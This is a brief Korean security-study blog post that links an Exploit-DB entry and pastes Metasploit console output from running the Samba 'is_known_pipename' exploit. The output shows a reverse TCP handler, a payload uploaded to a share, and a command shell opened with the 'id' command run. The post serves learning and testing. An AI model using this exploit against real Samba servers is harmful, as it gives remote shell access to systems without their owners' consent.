728x90
반응형
https://www.exploit-db.com/exploits/42084/
1. exploit-db 에서 copy
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.0.3:4444
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
반응형
'Cyber Security' 카테고리의 다른 글
[해킹공격의예술] 1. 직접 해보기 [0x250] (0) | 2017.06.07 |
---|---|
AT&T 문법과 인텔 문법의 차이 (0) | 2017.06.04 |
Metasploit을 활용한 Windows 7 취약점 스터디 (0) | 2017.05.31 |
[Kali Linux] - Virtualbox 공유폴더 마운트 (우분투, Ubuntu 포함) (0) | 2017.05.31 |
Metasploit & Searchsploit 스터디 (0) | 2017.05.31 |